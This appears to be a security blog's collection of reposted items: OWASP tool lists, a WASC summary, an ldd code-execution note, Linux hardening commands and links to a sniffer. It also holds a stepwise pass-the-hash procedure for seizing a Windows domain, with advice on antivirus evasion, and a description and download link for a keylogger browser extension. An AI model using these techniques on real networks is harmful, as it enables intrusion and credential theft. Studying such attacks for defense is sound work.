Googlegath – http://www.nothink.org/perl/googlegath/
Advanced Dork (Firefox Add-on) – https://addons.mozilla.org/firefox/2144/
Passive Cache (Firefox Add-on) – https://addons.mozilla.org/firefox/977/
CacheOut! (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1453/
BugMeNot Extension (Firefox Add-on) – http://roachfiend.com/archives/2005/02/07/bugmenot/
TrashMail.net Extension (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1813/
DiggiDig (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/2819/
Digger (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1467/
Database security assessment

Scuba by Imperva Database Vulnerability Scanner – http://www.imperva.com/scuba/
Browser Defenses

DieHard – http://www.diehard-software.org/
LocalRodeo (Firefox Add-on) – http://databasement.net/labs/localrodeo/
NoMoXSS – http://www.seclab.tuwien.ac.at/projects/jstaint/
Request Rodeo – http://savannah.nongnu.org/projects/requestrodeo
FlashBlock (Firefox Add-on) – http://flashblock.mozdev.org/
CookieSafe (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/2497
NoScript (Firefox Add-on) – http://www.noscript.net/
FormFox (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1579/
Adblock (Firefox Add-on) – http://adblock.mozdev.org/
httpOnly in Firefox (Firefox Add-on) – http://blog.php-security.org/archives/40-httpOnly-Cookies-in-Firefox-2.0.html
SafeCache (Firefox Add-on) – http://www.safecache.com/
SafeHistory (Firefox Add-on) – http://www.safehistory.com/
PrefBar (Firefox Add-on) – http://prefbar.mozdev.org/
All-in-One Sidebar (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1027/
QArchive.org web file checker (Firefox Add-on) – https://addons.mozilla.org/firefox/4115/
Update Notified (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/2098/
FireKeeper – http://firekeeper.mozdev.org/
Greasemonkey: XSS Malware Script Detector – http://yehg.net/lab/#tools.greasemonkey
Browser Privacy

TrackMeNot (Firefox Add-on) – https://addons.mozilla.org/firefox/3173/
Privacy Bird – http://www.privacybird.com/
Application and protocol fuzzing (random instead of targeted)

Sulley – http://fuzzing.org/
taof: The Art of Fuzzing – http://sourceforge.net/projects/taof/
zzuf: multipurpose fuzzer – http://sam.zoy.org/zzuf/
autodafé: an act of software torture – http://autodafe.sourceforge.net/
EFS and GPF: Evolutionary Fuzzing System – http://www.appliedsec.com/resources.html

repost src: http://www.owasp.org/index.php/Phoenix/Tools
src: http://owasp.blogspot.com/2009/12/sql-injection-resources.html

The WASC Threat Classification is a cooperative effort to clarify and organize the threats to the security of a web site. The members of the Web Application Security Consortium have created this project to develop and promote industry standard terminology for describing these issues. Application developers, security professionals, software vendors, and compliance auditors will have the ability to access a consistent language and definitions for web security related issues.

src: http://projects.webappsec.org/Threat-Classification

“The ldd utility is more vulnerable than you think. It’s frequently used by programmers and system administrators to determine the dynamic library dependencies of executables. Sounds pretty innocent, right? Wrong! It turns out that running ldd on an executable can result in executing arbitrary code. This article details how such executable can be constructed and comes up with a social engineering scenario that may lead to system compromise. I researched this subject thoroughly and found that it’s almost completely undocumented.”

source:
http://www.catonmat.net/blog/ldd-arbitrary-code-execution/
http://tech.slashdot.org/story/09/10/26/1314209/Arbitrary-Code-Execution-With-ldd

source : http://securitytube.net/How-to-own-a-Windows-Domain-video.aspx

Z (Z [at] wechall [dot] net) submitted this cool video to us. According to his submission:- I had to cut this video to a short one, so please use the pause button if something is too quick The mission is to create a new Windows domain administrator – in case we do not have any user in the domain or any local user at the workstation. Prerequisites:

1. Physical access to one of the domain member workstations for ~20 minutes.
2. Every local administrator user on the workstations have the same password. Strong or weak, it does not matter. NO social engineering, NO password stealer, NO password cracker, NO malicious code, NO exploiting zero-day or already patched vulnerabilities.

Tools used for the attack:

1. ophcrack (to get the local admin LM&NTLM hashes)
2. Offline NT Password & Registry Editor, Bootdisk / CD from Petter Nordahl-Hagen (to login as local admin)
3. pass-the-hash toolkit from Hernan Ochoa – Core Security (to authenticate with the hashes, so we do not have to crack them)
4. psexec from Mark Russinovich (to run remote commands)

Demo architecture: We have at least 3 computers: the workstation (WKS) for which we have physical access, the domain controller, and a workstation (ADMIN-WKS) with a logged in domain administrator (DomainAdmin).

Steps:

1. Boot the workstation with ophcrack. Stop the cracking process, and save the hashes. View the hashes, and write the local administrator hashes down with pencil&paper (or copy it on a USB stick, etc.).
2. Boot in with the Offline NT Password & Registry Editor. Reset the local administrator password to blank, and reboot. 3. Login with administrator to the workstation with blank password.
4. Use iam.exe or iam-alt.exe to change the LM&NTLM hashes in the memory.
5. Copy the pass-the-hash toolkit to the admin-wks via an administrator share.
6. Run the whosthere.exe or whosthere-alt.exe to get the DomainAdmin LM&NTLM hashes.
7. Create a local user called DomainAdmin, and login into that profile.
8. Use iam.exe or iam-alt.exe with the DomainAdmin hashes to change the LM & NTLM hashes in the memory.
9. Right now we have the same privileges as the DomainAdmin, so we can create a domain admin for ourself. Or anything else we want in the domain (reset anyone elses password, read someone elses e-mail, etc.).

Known limitations:

1. Some Windows versions / service packs are not compatible with the pass-the-hash toolkit, feel free to modify the source or debug the libraries to get the correct memory addresses.
2. Some AV engines detect pass-the-hash toolkit as malicious code, use AV evasion techniques against them.

What is cool?

1. It does not matter how complex the local admin and domain admin passwords are.
2. It works even if the domain admins are forced to use smart cards for interactive login.
3. We have not used any of the attacks mentioned above, so it works on fully patched networks with security paranoid admins.

Tools
Ophcrack live CD
Offline NT Password & Registry Editor, Bootdisk / CD from Petter Nordahl-Hagen
pass-the-hash toolkit from Hernan Ochoa – Core Security
psexec from Mark Russinovich

source: http://www.cromwell-intl.com/security/security-stack-hardening.html

#Disable ICMP broadcast echo activity.
sysctl -w net.ipv4.icmp_echo_ignore_broadcasts=1
#Disable ICMP routing redirects.
sysctl -w net.ipv4.conf.all.accept_redirects=0
sysctl -w net.ipv6.conf.all.accept_redirects=0
sysctl -w net.ipv4.conf.all.send_redirects=0
sysctl -w net.ipv6.conf.all.send_redirects=0
#Disable IP source routing.
sysctl -w net.ipv4.conf.all.accept_source_route=0
sysctl -w net.ipv4.conf.all.forwarding=0
sysctl -w net.ipv4.conf.all.mc_forwarding=0
#Enforce sanity checking, also called ingress filtering or egress filtering
sysctl -w net.ipv4.conf.all.rp_filter=1
#Log and drop "Martian" packets.
sysctl -w net.ipv4.conf.all.log_martians=1
#Increase resiliance under heavy TCP load (which makes the system more resistant to SYN Flood attacks).
sysctl -w net.ipv4.tcp_max_syn_backlog=1280
sysctl -w net.ipv4.tcp_syncookies=1


Hardening Guides

Center for Internet Security (CIS)
Red Hat Enterprise Linux 4 Security guide
Red Hat Enterprise Linux 4 SElinux Guide
Securing Debian Manual
IASE : Security Technical Implementation Guides
NSA: Current Security Configuration Guides
Red Hat Enterprise Linux 5 Hardening guide

Hardening Tools
Bastille linux/UNIX
TRUSTED : Security Blanket

Httpry – HTTP Traffic sniffer

Httpry, is a sniffer specializing in sniffing http traffic. Httpry is used to log and display http traffic by capturing, parsing and logging the traffic for further analysis.

http://www.lifedork.net/httpry-http-traffic-sniffer.html
http://dumpsterventures.com/jason/httpry/httpry-0.1.5.tar.gz

Firefox Addons own ya – Keylogger POC

My small POC consists of a keylogger written in javascript and embedded into Firefox browser in form of extension. This code can be injected into any known/famous addon without even noticing it since it creates no warnings at Antiviruses (it’s just legal javascript) and no warning from Firewalls since the logs of the keystrokes are sent through Firefox on port 80 to a malicious server.

http://blogs.hackerscenter.com/2008/04/firefox-addons-threat.html
http://www.hackerscenter.com/public/Firefox_poc/poc_keylogger.zip